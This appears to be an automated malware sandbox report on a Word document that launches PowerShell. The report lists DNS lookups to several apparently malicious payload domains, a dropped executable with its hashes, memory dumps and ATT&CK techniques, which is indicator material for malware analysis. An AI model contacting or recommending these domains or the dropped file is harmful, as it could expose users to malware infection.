GET https://tse1.mm.bing.net/th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.1kB
16
14
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.1kB
16
14
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.1kB
16
14

8.8.8.8:53

roaming.officeapps.live.com

dns

WINWORD.EXE

73 B
244 B
1
1

DNS Request

roaming.officeapps.live.com

DNS Response

52.109.28.47
8.8.8.8:53

104.219.191.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

104.219.191.52.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

47.28.109.52.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

47.28.109.52.in-addr.arpa
8.8.8.8:53

46.28.109.52.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

46.28.109.52.in-addr.arpa
8.8.8.8:53

14.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.160.190.20.in-addr.arpa
8.8.8.8:53

givingthanksdaily.com

dns

powershell.exe

67 B
83 B
1
1

DNS Request

givingthanksdaily.com

DNS Response

66.96.134.60
8.8.8.8:53

tskgear.com

dns

powershell.exe

57 B
73 B
1
1

DNS Request

tskgear.com

DNS Response

103.197.57.20
8.8.8.8:53

6.173.189.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

6.173.189.20.in-addr.arpa
8.8.8.8:53

241.150.49.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

241.150.49.20.in-addr.arpa
8.8.8.8:53

60.134.96.66.in-addr.arpa

dns

71 B
115 B
1
1

DNS Request

60.134.96.66.in-addr.arpa
8.8.8.8:53

20.57.197.103.in-addr.arpa

dns

72 B
106 B
1
1

DNS Request

20.57.197.103.in-addr.arpa
8.8.8.8:53

26.35.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

26.35.223.20.in-addr.arpa
8.8.8.8:53

184.83.221.88.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

184.83.221.88.in-addr.arpa
8.8.8.8:53

226.21.18.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

226.21.18.104.in-addr.arpa
8.8.8.8:53

duolife-partner.com

dns

powershell.exe

65 B
138 B
1
1

DNS Request

duolife-partner.com
8.8.8.8:53

ponturibaschetcristianionut.com

dns

powershell.exe

77 B
150 B
1
1

DNS Request

ponturibaschetcristianionut.com
8.8.8.8:53

mrveggy.com

dns

powershell.exe

57 B
73 B
1
1

DNS Request

mrveggy.com

DNS Response

177.12.170.95
8.8.8.8:53

ifarmer.com.br

dns

powershell.exe

60 B
60 B
1
1

DNS Request

ifarmer.com.br
8.8.8.8:53

uniteddatabase.net

dns

powershell.exe

64 B
80 B
1
1

DNS Request

uniteddatabase.net

DNS Response

173.254.237.178
8.8.8.8:53

95.170.12.177.in-addr.arpa

dns

72 B
114 B
1
1

DNS Request

95.170.12.177.in-addr.arpa
8.8.8.8:53

178.237.254.173.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

178.237.254.173.in-addr.arpa
8.8.8.8:53

metadata.templates.cdn.office.net

dns

WINWORD.EXE

79 B
231 B
1
1

DNS Request

metadata.templates.cdn.office.net

DNS Response

23.62.61.162

23.62.61.184
8.8.8.8:53

binaries.templates.cdn.office.net

dns

WINWORD.EXE

79 B
202 B
1
1

DNS Request

binaries.templates.cdn.office.net

DNS Response

2.17.251.23

2.17.251.17
8.8.8.8:53

162.61.62.23.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

162.61.62.23.in-addr.arpa
8.8.8.8:53

23.251.17.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

23.251.17.2.in-addr.arpa
8.8.8.8:53

183.59.114.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

183.59.114.20.in-addr.arpa
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

22.236.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

22.236.111.52.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
173 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

205.47.74.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

205.47.74.20.in-addr.arpa
8.8.8.8:53

106.246.116.51.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

106.246.116.51.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vukzly54.wb1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl

Filesize
245KB

MD5
f883b260a8d67082ea895c14bf56dd56

SHA1
7954565c1f243d46ad3b1e2f1baf3281451fc14b

SHA256
ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

SHA512
d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

Download Submit
C:\Users\Admin\m4Obyxb\O2ee0Qk\W_c1yyz.exe

Filesize
60KB

MD5
6b8469cda5a5dd989f9b1b5d0748e0cb

SHA1
5d0e53f5ba85ef5288a1883e75528e3df3a3da60

SHA256
b3e2d2bb65ee223bda473aab760bafaacf3e6fab52f0c290690e5ff5632fd1d2

SHA512
bba57cc6d1ecb240404f75f97549de22aac482894f3d1ca203aaf2236d05af01f8c51c7d11a86d8f8b5251ce8a28c9d7ba47912c91e4f6b0d14b1644c836634a

Download Submit
memory/1692-10-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

Filesize
2.0MB

Download
memory/1692-62-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

Filesize
2.0MB

Download
memory/1692-7-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

Filesize
2.0MB

Download
memory/1692-9-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

Filesize
2.0MB

Download
memory/1692-8-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

Filesize
64KB

Download
memory/1692-5-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

Filesize
2.0MB

Download
memory/1692-3-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

Filesize
64KB

Download
memory/1692-0-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

Filesize
64KB

Download
memory/1692-13-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

Filesize
2.0MB

Download
memory/1692-14-0x00007FFA27CD0000-0x00007FFA27CE0000-memory.dmp

Filesize
64KB

Download
memory/1692-16-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

Filesize
2.0MB

Download
memory/1692-15-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

Filesize
2.0MB

Download
memory/1692-12-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

Filesize
2.0MB

Download
memory/1692-11-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

Filesize
2.0MB

Download
memory/1692-17-0x00007FFA27CD0000-0x00007FFA27CE0000-memory.dmp

Filesize
64KB

Download
memory/1692-29-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

Filesize
2.0MB

Download
memory/1692-33-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

Filesize
2.0MB

Download
memory/1692-60-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

Filesize
2.0MB

Download
memory/1692-6-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

Filesize
2.0MB

Download
memory/1692-61-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

Filesize
2.0MB

Download
memory/1692-4-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

Filesize
64KB

Download
memory/1692-617-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

Filesize
2.0MB

Download
memory/1692-2-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

Filesize
64KB

Download
memory/1692-108-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

Filesize
2.0MB

Download
memory/1692-109-0x00007FFA6A44D000-0x00007FFA6A44E000-memory.dmp

Filesize
4KB

Download
memory/1692-110-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

Filesize
2.0MB

Download
memory/1692-111-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

Filesize
2.0MB

Download
memory/1692-1-0x00007FFA6A44D000-0x00007FFA6A44E000-memory.dmp

Filesize
4KB

Download
memory/1692-589-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

Filesize
2.0MB

Download
memory/1692-590-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

Filesize
2.0MB

Download
memory/1692-591-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

Filesize
2.0MB

Download
memory/1692-592-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

Filesize
2.0MB

Download
memory/1692-614-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

Filesize
64KB

Download
memory/1692-615-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

Filesize
64KB

Download
memory/1692-613-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

Filesize
64KB

Download
memory/1692-616-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

Filesize
64KB

Download
memory/2384-82-0x000001B9298E0000-0x000001B929902000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response